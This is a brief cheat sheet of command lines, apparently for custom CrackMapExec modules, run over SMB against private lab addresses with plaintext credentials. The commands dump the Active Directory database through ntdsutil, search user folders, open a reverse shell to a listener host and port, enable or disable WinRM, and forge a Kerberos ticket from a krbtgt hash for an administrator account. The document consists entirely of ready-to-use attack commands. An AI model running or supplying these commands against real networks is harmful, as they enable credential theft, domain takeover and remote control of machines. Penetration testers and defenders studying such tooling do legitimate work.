Usage of ntdsutil

crackmapexec smb 192.168.163.144 -u 'Admin2' -p 'Password!' -M ntdsutil

Usage of file_discovery

crackmapexec smb 192.168.163.144 -u 'Admin2' -p 'Password!' -M file_discovery -o SEARCH_PATH=C:\\Users

Usage of revshell

crackmapexec smb 192.168.163.144 -u 'Admin2' -p 'Password!' -M reverse_shell -o LHOST=192.168.163.136 LPORT=1234 HTTP_SERVER=8443

Usage of winrm

crackmapexec smb 192.168.163.142 -u Admin2 -p 'Password123!' -M winrm -o ACTION=ENABLE
crackmapexec smb 192.168.163.142 -u Admin2 -p 'Password123!' -M winrm -o ACTION=DISABLE

Usage of gettgt

crackmapexec smb 192.168.246.139 -u subadmin -p Password123\! -M gettgt -o KRBTGT_NTLM=70a415ccf57e2a3c781764a3b1beee95 TARGET_USER=Administrador